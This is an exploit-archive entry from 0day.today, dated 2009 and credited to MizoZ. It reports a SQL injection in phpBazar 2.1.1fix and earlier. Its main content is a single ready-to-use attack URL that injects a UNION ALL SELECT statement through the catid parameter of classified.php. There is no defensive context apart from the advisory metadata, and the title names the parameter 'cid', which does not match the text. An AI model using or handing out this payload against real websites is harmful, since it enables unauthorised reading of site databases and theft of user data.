phpBazar <= 2.1.1fix (cid) SQL Injection

2009-11-28T00:00:00
ID 1337DAY-ID-10037
Type zdt
Reporter MizoZ
Modified 2009-11-28T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================
phpBazar <= 2.1.1fix (cid) SQL Injection
========================================

The vulnerability is in the $_GET['catid'] , exploit :
http://server/classified.php?catid=2+and+1=0+union+all+select+1,2,3,4,5,6,7--


#  0day.today [2018-03-14]  #